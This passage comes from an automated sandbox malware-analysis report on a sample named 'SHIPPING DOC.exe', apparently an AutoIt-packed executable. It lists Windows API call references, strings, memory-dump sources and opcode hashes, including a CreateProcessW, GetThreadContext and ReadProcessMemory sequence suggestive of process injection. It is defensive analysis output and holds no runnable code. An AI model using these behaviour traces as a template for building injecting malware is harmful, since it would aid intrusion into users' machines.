                                                                                                                      • Associated: 00000000.00000002.1271955885.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.1271955885.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.1271982448.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_0_2_400000_SHIPPING DOC.jbxd
                                                                                                                      Similarity
                                                                                                                      • API ID: Close$OpenQueryValue
                                                                                                                      • String ID: Control Panel\Mouse
                                                                                                                      • API String ID: 1607946009-824357125
                                                                                                                      • Opcode ID: 0a2ddf5dd10fc63f6e19eedc2563a5e53f3783e3c799d68c1c3a3a1866560054
                                                                                                                      • Instruction ID: a31ac2e1b7deaa2d1d9e7506379341dce8fcd1dacbe24dc49005ae4a0027d3ba
                                                                                                                      • Opcode Fuzzy Hash: 0a2ddf5dd10fc63f6e19eedc2563a5e53f3783e3c799d68c1c3a3a1866560054
                                                                                                                      • Instruction Fuzzy Hash: 91118C76640108AFCB10CFA8ED459EFB7BCEF59300B1089AAF908C3210E6759A11DBA4
                                                                                                                      APIs
                                                                                                                      • CreateProcessW.KERNELBASE(?,00000000), ref: 03CF0BDB
                                                                                                                      • Wow64GetThreadContext.KERNEL32(?,00010007), ref: 03CF0C71
                                                                                                                      • ReadProcessMemory.KERNELBASE(?,?,?,00000004,00000000), ref: 03CF0C93
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 00000000.00000002.1272786000.0000000003CEF000.00000040.00000020.00020000.00000000.sdmp, Offset: 03CEF000, based on PE: false
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_0_2_3cef000_SHIPPING DOC.jbxd
                                                                                                                      Similarity
                                                                                                                      • API ID: Process$ContextCreateMemoryReadThreadWow64
                                                                                                                      • String ID:
                                                                                                                      • API String ID: 2438371351-0
                                                                                                                      • Opcode ID: d21c280c783bbae91a429f84d87e257f256d4475b71677e5b67df5fe47b3db5a
                                                                                                                      • Instruction ID: 6e191277a997fdb8049811610df2e0d9998c65e1a7c92e4485f0a1bcbde8eb5c
                                                                                                                      • Opcode Fuzzy Hash: d21c280c783bbae91a429f84d87e257f256d4475b71677e5b67df5fe47b3db5a
                                                                                                                      • Instruction Fuzzy Hash: 22620930A14218DBEB64CFA4CC40BDEB376EF58700F1091A9D20DEB291E7769E81CB59
                                                                                                                      APIs
                                                                                                                        • Part of subcall function 0040F760: _strcat.LIBCMT ref: 0040F786
                                                                                                                      • _free.LIBCMT ref: 004295A0
                                                                                                                        • Part of subcall function 004033C0: GetCurrentDirectoryW.KERNEL32(00000104,?,?), ref: 00403451
                                                                                                                        • Part of subcall function 004033C0: GetFullPathNameW.KERNEL32(?,00000104,?,?), ref: 00403467
                                                                                                                        • Part of subcall function 004033C0: __wsplitpath.LIBCMT ref: 00403492
                                                                                                                        • Part of subcall function 004033C0: _wcscpy.LIBCMT ref: 004034A7
                                                                                                                        • Part of subcall function 004033C0: _wcscat.LIBCMT ref: 004034BC
                                                                                                                        • Part of subcall function 004033C0: SetCurrentDirectoryW.KERNEL32(?), ref: 004034CC
                                                                                                                      Strings
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 00000000.00000002.1271877399.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                      • Associated: 00000000.00000002.1271865192.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.1271915891.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.1271930798.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.1271944414.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.1271955885.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.1271955885.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.1271982448.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_0_2_400000_SHIPPING DOC.jbxd
                                                                                                                      Similarity
                                                                                                                      • API ID: CurrentDirectory$FullNamePath__wsplitpath_free_strcat_wcscat_wcscpy
                                                                                                                      • String ID: >>>AUTOIT SCRIPT<<<$C:\Users\user\Desktop\SHIPPING DOC.exe
                                                                                                                      • API String ID: 3938964917-2178743075
                                                                                                                      • Opcode ID: 85129ba88a80f874cc85648756a67b28b96809e39b045faff7acf40c360edc50
                                                                                                                      • Instruction ID: c8289cc7cde30cfde4dff3f83c8481f20f860a5b07fa540731426c520eca24fb
                                                                                                                      • Opcode Fuzzy Hash: 85129ba88a80f874cc85648756a67b28b96809e39b045faff7acf40c360edc50
                                                                                                                      • Instruction Fuzzy Hash: 9A919171A00219ABCF04EFA5D8819EE7774BF48314F50452EF915B7391D778EA06CBA8
                                                                                                                      APIs
                                                                                                                      Strings
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 00000000.00000002.1271877399.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                      • Associated: 00000000.00000002.1271865192.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.1271915891.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.1271930798.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.1271944414.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.1271955885.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.1271955885.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.1271982448.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_0_2_400000_SHIPPING DOC.jbxd
                                                                                                                      Similarity
                                                                                                                      • API ID: _memmove
                                                                                                                      • String ID: Error:
                                                                                                                      • API String ID: 4104443479-232661952
                                                                                                                      • Opcode ID: 0f3a33fb7be69c8e6baf3b23b87111ea2728d16161c2c78c6bada8bccab6f67e
                                                                                                                      • Instruction ID: 2c658176ab693071ca67d4d31bd2fe4acf4d59654e7b744331f3a235cb1e2e29
                                                                                                                      • Opcode Fuzzy Hash: 0f3a33fb7be69c8e6baf3b23b87111ea2728d16161c2c78c6bada8bccab6f67e
                                                                                                                      • Instruction Fuzzy Hash: 0D3191716006059FC324DF29C881AA7B3E6EF84314B24853FE95AC7791EB79E941CBD8
                                                                                                                      APIs
                                                                                                                      • GetOpenFileNameW.COMDLG32(?), ref: 0042961B
                                                                                                                        • Part of subcall function 00410120: GetFullPathNameW.KERNEL32(00000000,00000104,C:\Users\user\Desktop\SHIPPING DOC.exe,0040F545,C:\Users\user\Desktop\SHIPPING DOC.exe,004A90E8,C:\Users\user\Desktop\SHIPPING DOC.exe,?,0040F545), ref: 0041013C
                                                                                                                        • Part of subcall function 004102B0: SHGetMalloc.SHELL32(0040F54C), ref: 004102BD
                                                                                                                        • Part of subcall function 004102B0: SHGetDesktopFolder.SHELL32(?,004A90E8), ref: 004102D2
                                                                                                                        • Part of subcall function 004102B0: _wcsncpy.LIBCMT ref: 004102ED
                                                                                                                        • Part of subcall function 004102B0: SHGetPathFromIDListW.SHELL32(?,?), ref: 00410327
                                                                                                                        • Part of subcall function 004102B0: _wcsncpy.LIBCMT ref: 00410340
                                                                                                                        • Part of subcall function 00410190: GetFullPathNameW.KERNEL32(?,00000104,?,?,?), ref: 004101AB
                                                                                                                      Strings
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 00000000.00000002.1271877399.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                      • Associated: 00000000.00000002.1271865192.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.1271915891.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.1271930798.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.1271944414.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.1271955885.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.1271955885.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.1271982448.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_0_2_400000_SHIPPING DOC.jbxd
                                                                                                                      Similarity
                                                                                                                      • API ID: NamePath$Full_wcsncpy$DesktopFileFolderFromListMallocOpen
                                                                                                                      • String ID: X$pWH
                                                                                                                      • API String ID: 85490731-941433119
                                                                                                                      • Opcode ID: 1b62eedeb2ba23f3a12794f4d72c3fd3ac9c0abd578206ca8986e50026ca9cbc
                                                                                                                      • Instruction ID: b6f0e4d7e30e2857a1e9cc165fafff24640ac0dd2e9829c062eaf90218724cbe
                                                                                                                      • Opcode Fuzzy Hash: 1b62eedeb2ba23f3a12794f4d72c3fd3ac9c0abd578206ca8986e50026ca9cbc
                                                                                                                      • Instruction Fuzzy Hash: 1F118AB0A00244ABDB11EFD9DC457DEBBF95F45304F14842AE504AB392D7FD08498BA9
                                                                                                                      APIs
                                                                                                                      • _wcslen.LIBCMT ref: 00401B11
                                                                                                                        • Part of subcall function 004115D7: _malloc.LIBCMT ref: 004115F1
                                                                                                                      • _memmove.LIBCMT ref: 00401B57
                                                                                                                        • Part of subcall function 004115D7: std::exception::exception.LIBCMT ref: 00411626
                                                                                                                        • Part of subcall function 004115D7: std::exception::exception.LIBCMT ref: 00411640
                                                                                                                        • Part of subcall function 004115D7: __CxxThrowException@8.LIBCMT ref: 00411651
                                                                                                                      Strings
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 00000000.00000002.1271877399.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                      • Associated: 00000000.00000002.1271865192.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.1271915891.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.1271930798.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.1271944414.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.1271955885.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.1271955885.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.1271982448.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_0_2_400000_SHIPPING DOC.jbxd
                                                                                                                      Similarity
                                                                                                                      • API ID: std::exception::exception$Exception@8Throw_malloc_memmove_wcslen
                                                                                                                      • String ID: @EXITCODE
                                                                                                                      • API String ID: 2734553683-3436989551
                                                                                                                      • Opcode ID: d09de110ff079f104ffdf991df362542016b83ce61c8771042b9fd4bbac4f926
                                                                                                                      • Instruction ID: 16ac7666fc6b8d0cd4c8082de1062d74cbdf630d8e5b0a9ec9a55ac2b86b5c72
                                                                                                                      • Opcode Fuzzy Hash: d09de110ff079f104ffdf991df362542016b83ce61c8771042b9fd4bbac4f926
                                                                                                                      • Instruction Fuzzy Hash: D5F0CDF2B00641AFD720DB36DC02B6775E49B84308F04883EA24BC6795FA7DE4828B14
                                                                                                                      Strings
                                                                                                                      • >>>AUTOIT NO CMDEXECUTE<<<, xrefs: 0042804F
                                                                                                                      • C:\Users\user\Desktop\SHIPPING DOC.exe, xrefs: 00410107
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 00000000.00000002.1271877399.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                      • Associated: 00000000.00000002.1271865192.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.1271915891.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.1271930798.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.1271944414.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.1271955885.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.1271955885.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.1271982448.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_0_2_400000_SHIPPING DOC.jbxd
                                                                                                                      Similarity
                                                                                                                      • API ID: _strcat
                                                                                                                      • String ID: >>>AUTOIT NO CMDEXECUTE<<<$C:\Users\user\Desktop\SHIPPING DOC.exe
                                                                                                                      • API String ID: 1765576173-3054034525
                                                                                                                      • Opcode ID: afbcd64a5de9b9cf0401a7756764eed502eca04e8b93ddfb1cf174919bef9872
                                                                                                                      • Instruction ID: e645463cc19bd0c1a49bcabea2d674544a6c2f3c5714d62cb3526a870e150300
                                                                                                                      • Opcode Fuzzy Hash: afbcd64a5de9b9cf0401a7756764eed502eca04e8b93ddfb1cf174919bef9872
                                                                                                                      • Instruction Fuzzy Hash: FBF090B390020D768B00F6E6D942CEFB37C9985704B5006AFA905B3152EA79EA0987B6
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 00000000.00000002.1271877399.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                      • Associated: 00000000.00000002.1271865192.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.1271915891.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.1271930798.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.1271944414.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.1271955885.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.1271955885.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.1271982448.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_0_2_400000_SHIPPING DOC.jbxd
                                                                                                                      Similarity
                                                                                                                      • API ID:
                                                                                                                      • String ID:
                                                                                                                      • API String ID:
                                                                                                                      • Opcode ID: 7af5e299b258df5e9c9a2551ed0e7af6e1d4c875de24c7fdf76d77545964eae0
                                                                                                                      • Instruction ID: 8c99b1ef877cebc7a747b8a97cc81d83a07aa3771b44d3adc2ea031a64448d8d
                                                                                                                      • Opcode Fuzzy Hash: 7af5e299b258df5e9c9a2551ed0e7af6e1d4c875de24c7fdf76d77545964eae0
                                                                                                                      • Instruction Fuzzy Hash: CEF18C716043019FC700DF29C884A5AB7E5FF88318F14C95EF9998B392D7B9E945CB86
                                                                                                                      APIs
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 00000000.00000002.1271877399.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                      • Associated: 00000000.00000002.1271865192.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.1271915891.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.1271930798.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.1271944414.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.1271955885.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.1271955885.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.1271982448.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_0_2_400000_SHIPPING DOC.jbxd
                                                                                                                      Similarity
                                                                                                                      • API ID: __filbuf__getptd_noexit__read_memcpy_s
                                                                                                                      • String ID:
                                                                                                                      • API String ID: 1794320848-0
                                                                                                                      • Opcode ID: b5af9ce9d8135965a8c163c1359f1833c669f36246c0dfec509ee2915f8c5eb0
                                                                                                                      • Instruction ID: 2f36134af58cf06217a4581a57f76d3547d7b7b98d7afe96428f3577b7504850
                                                                                                                      • Opcode Fuzzy Hash: b5af9ce9d8135965a8c163c1359f1833c669f36246c0dfec509ee2915f8c5eb0
                                                                                                                      • Instruction Fuzzy Hash: 6C51E631A01208DBCB249F69C9446DFB7B1AFC0364F25826BE43597290E378EED1CB59
                                                                                                                      APIs
                                                                                                                      • GetCurrentProcess.KERNEL32(00000000,?,00000067,000000FF), ref: 004753C7
                                                                                                                      • TerminateProcess.KERNEL32(00000000), ref: 004753CE
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 00000000.00000002.1271877399.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                      • Associated: 00000000.00000002.1271865192.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.1271915891.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.1271930798.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.1271944414.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.1271955885.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.1271955885.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.1271982448.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_0_2_400000_SHIPPING DOC.jbxd
                                                                                                                      Similarity
                                                                                                                      • API ID: Process$CurrentTerminate
                                                                                                                      • String ID:
                                                                                                                      • API String ID: 2429186680-0
                                                                                                                      • Opcode ID: aaa6002d905a33e4c3ceade7f85f71e7f986a1c67485104df61a1a5e3f63762c
                                                                                                                      • Instruction ID: dddcdfafc98398d1c0f0a19edd80e49036cf45bbfca44c020541658de01b6296
                                                                                                                      • Opcode Fuzzy Hash: aaa6002d905a33e4c3ceade7f85f71e7f986a1c67485104df61a1a5e3f63762c
                                                                                                                      • Instruction Fuzzy Hash: 2C519D71604301AFC710DF65C881BABB7E5EF88308F14891EF9598B382D7B9D945CB96
                                                                                                                      APIs
                                                                                                                      • _malloc.LIBCMT ref: 0043214B
                                                                                                                        • Part of subcall function 004135BB: __FF_MSGBANNER.LIBCMT ref: 004135D4
                                                                                                                        • Part of subcall function 004135BB: __NMSG_WRITE.LIBCMT ref: 004135DB
                                                                                                                        • Part of subcall function 004135BB: RtlAllocateHeap.NTDLL(00000000,00000001,?,?,?,?,004115F6,?,00401BAC,?,?,?), ref: 00413600
                                                                                                                      • _malloc.LIBCMT ref: 0043215D
                                                                                                                      • _malloc.LIBCMT ref: 0043216F
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 00000000.00000002.1271877399.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                      • Associated: 00000000.00000002.1271865192.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.1271915891.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.1271930798.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.1271944414.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.1271955885.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.1271955885.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.1271982448.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_0_2_400000_SHIPPING DOC.jbxd
                                                                                                                      Similarity
                                                                                                                      • API ID: _malloc$AllocateHeap
                                                                                                                      • String ID:
                                                                                                                      • API String ID: 680241177-0
                                                                                                                      • Opcode ID: f71c381a9a4e64bea8472010c286ed0a2169748a03ca4327bb91778eef0474c7
                                                                                                                      • Instruction ID: dac51259f70ca5acf95ac1b1a30df86389447b5c3122b5fc7e5239b6c816f1c7
                                                                                                                      • Opcode Fuzzy Hash: f71c381a9a4e64bea8472010c286ed0a2169748a03ca4327bb91778eef0474c7
                                                                                                                      • Instruction Fuzzy Hash: A0F0E273200B142AD2206A6A6DC1BE7B39ADBD4765F00403FFB058A206DAE9988542EC
                                                                                                                      APIs
                                                                                                                      • TranslateMessage.USER32(?), ref: 00409556
                                                                                                                      • DispatchMessageW.USER32(?), ref: 00409561
                                                                                                                      • PeekMessageW.USER32(?,00000000,00000000,00000000,00000001), ref: 00409574
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 00000000.00000002.1271877399.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                      • Associated: 00000000.00000002.1271865192.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.1271915891.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.1271930798.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.1271944414.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.1271955885.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.1271955885.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.1271982448.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_0_2_400000_SHIPPING DOC.jbxd
                                                                                                                      Similarity
                                                                                                                      • API ID: Message$DispatchPeekTranslate
                                                                                                                      • String ID:
                                                                                                                      • API String ID: 4217535847-0
                                                                                                                      • Opcode ID: ced410c349f54cf5afb894e4facd1df4a4f56f438d67fe37ea70020fd5d89546
                                                                                                                      • Instruction ID: 9fbe2eaaa5ffb99098057fa667d4f29c0aa55754a5137076743fac66577e99fa
                                                                                                                      • Opcode Fuzzy Hash: ced410c349f54cf5afb894e4facd1df4a4f56f438d67fe37ea70020fd5d89546
                                                                                                                      • Instruction Fuzzy Hash: D8F05431554300AAE624D7A18D41F9B76A89F98784F40482EB641962E1EB78D444CB5A
                                                                                                                      APIs
                                                                                                                      • _free.LIBCMT ref: 0043210A
                                                                                                                        • Part of subcall function 00413748: RtlFreeHeap.NTDLL(00000000,00000000,?,00417A5A,00000000), ref: 0041375E
                                                                                                                        • Part of subcall function 00413748: GetLastError.KERNEL32(00000000,?,00417A5A,00000000), ref: 00413770
                                                                                                                      • _free.LIBCMT ref: 0043211D
                                                                                                                      • _free.LIBCMT ref: 00432130
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 00000000.00000002.1271877399.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                      • Associated: 00000000.00000002.1271865192.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.1271915891.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.1271930798.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.1271944414.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.1271955885.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.1271955885.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.1271982448.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_0_2_400000_SHIPPING DOC.jbxd
                                                                                                                      Similarity
                                                                                                                      • API ID: _free$ErrorFreeHeapLast
                                                                                                                      • String ID:
                                                                                                                      • API String ID: 776569668-0
                                                                                                                      • Opcode ID: 471d261c1978e8fd492efb66726f25644d258391566ce7e49abf025be84b45d1
                                                                                                                      • Instruction ID: d08fe22c6a524c27e4c6c7bcf1019f14b9a5eff3fc739cf1d41fcb720108e0a5
                                                                                                                      • Opcode Fuzzy Hash: 471d261c1978e8fd492efb66726f25644d258391566ce7e49abf025be84b45d1
                                                                                                                      • Instruction Fuzzy Hash: 29E092F290071433CD1099219941A87F38C4B15B11F08402AFA15A3301E969FA40C1E9
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 00000000.00000002.1271877399.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                      • Associated: 00000000.00000002.1271865192.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.1271915891.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.1271930798.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.1271944414.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.1271955885.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.1271955885.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.1271982448.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_0_2_400000_SHIPPING DOC.jbxd
                                                                                                                      Similarity
                                                                                                                      • API ID: std::exception::exception$Exception@8Throw_malloc
                                                                                                                      • String ID:
                                                                                                                      • API String ID: 2388904642-0
                                                                                                                      • Opcode ID: 0cc4a607a66a7dec8d32368fe69d228593046d0a29e305c11ea9e5b169c4fa1b
                                                                                                                      • Instruction ID: c9d0c8d414f76a6b08ea65189b173eda5e9afecf2ea9a4a3f4bd99c20d85b193
                                                                                                                      • Opcode Fuzzy Hash: 0cc4a607a66a7dec8d32368fe69d228593046d0a29e305c11ea9e5b169c4fa1b
                                                                                                                      • Instruction Fuzzy Hash: 37F1BE75A001099BCB14EF55CA895EEB375EF04304F60443BE905772E1DBBCAE86CB9A
                                                                                                                      APIs
                                                                                                                      • __wsplitpath.LIBCMT ref: 004678F7
                                                                                                                        • Part of subcall function 004115D7: _malloc.LIBCMT ref: 004115F1
                                                                                                                      • GetLastError.KERNEL32(00000000,00000000), ref: 004679C7
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 00000000.00000002.1271877399.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                      • Associated: 00000000.00000002.1271865192.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.1271915891.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.1271930798.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.1271944414.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.1271955885.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.1271955885.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.1271982448.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_0_2_400000_SHIPPING DOC.jbxd
                                                                                                                      Similarity
